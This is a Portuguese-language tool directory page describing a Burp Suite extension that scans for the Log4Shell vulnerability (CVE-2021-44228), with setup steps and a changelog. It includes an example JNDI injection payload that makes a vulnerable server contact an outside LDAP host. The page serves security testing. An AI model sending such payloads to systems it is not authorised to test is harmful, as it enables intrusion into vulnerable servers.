Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Log4J-Scanner — Extensão Burp para escanear a vulnerabilidade Log4Shell (CVE-2021-44228) pré e pós autenticação. | Kitploit
Ferramentas/GitHubGitHub/0xdexter0us/log4j-scanner
Scanners de VulnerabilidadesScanners de Vulnerabilidades WebExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHub0xdexter0us/log4j-scanner

Log4J-Scanner

Extensão Burp para escanear a vulnerabilidade Log4Shell (CVE-2021-44228) pré e pós autenticação.

Ver Repositório
10224há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

log4j

Extensão do Burp para escanear a vulnerabilidade Log4Shell (CVE-2021-44228) com payloads personalizados.



Aviso

Não me responsabilizo por suas ações, congelamento do Burp Suite, invasão do alvo, guerra termonuclear ou a crise econômica atual causada por você seguir estas instruções. VOCÊ está escolhendo usar esta ferramenta, e se apontar o dedo para mim por estragar alguma coisa, vou dar risada de você.


Gif de uso

Instruções:

  • Instale a extensão a partir dos lançamentos pré-compilados ou compile a partir do código-fonte.
  • Desative/Desmarque todas as outras extensões de escaneamento ativo, como active scan++, burp bounty pro, param-miner etc.
  • No menu superior, abra as configurações do Log4J Scanner.
  • Adicione seu payload personalizado e salve as configurações.
  • Selecione seu alvo > clique com botão direito > Scan.
  • Selecione Scan Configuration > Select from library
  • Selecione apenas Audit checks - extensions only e clique em OK.

Agradecimentos especiais a Silent Signal, as instruções e configurações de escaneamento foram inspiradas em sua extensão.

Instruções importantes para lembrar:

  • No seu payload personalizado, NÃO adicione a URL do seu colaborador, apenas coloque [collaborator-server] como espaço reservado,
  • [collaborator-server será substituído pela URL do seu servidor colaborador.
  • Exemplo de payload: "${jndi:ldap://[collaborator-server]/a}

Baixar lançamentos

https://github.com/0xDexter0us/Log4J-Scanner/releases/

Compilar a partir do código-fonte

  • ./gradlew build fatJar
  • Pegue o arquivo jar build/libs/Log4J-Scanner-x.x.x.jar

Instalação

  1. Baixe o jar mais recente a partir dos lançamentos ou compile a partir do código-fonte.
  2. Adicione o jar ao Burp Suite.

Se você gostou do projeto, por favor dê uma estrela no repositório! <3

Recursos

  • Para escaneamento passivo: https://github.com/f0ng/log4j2burpscanner
  • Para escaneamento ativo: https://github.com/albinowax/ActiveScanPlusPlus & https://github.com/silentsignal/burp-log4shell

Registro de alterações

25 de dezembro de 2021 - v0.2.0

  • Adicionada a API do Burp Collaborator.
  • Removido o scanner personalizado.
  • Adicionada a API do scanner do Burp.

13 de dezembro de 2021 - v0.1.0

  • Primeiro lançamento público

Agradecimentos

  • CoreyD97 - https://github.com/CoreyD97
  • Silent Signal - https://github.com/silentsignal

Isso foi codificado por mim em um dia e é um lançamento inicial, podem ocorrer bugs, relatos de bugs, sugestões e pull requests são bem-vindos :)


Participe do nosso servidor Discord!

ko-fi

Baixar ferramenta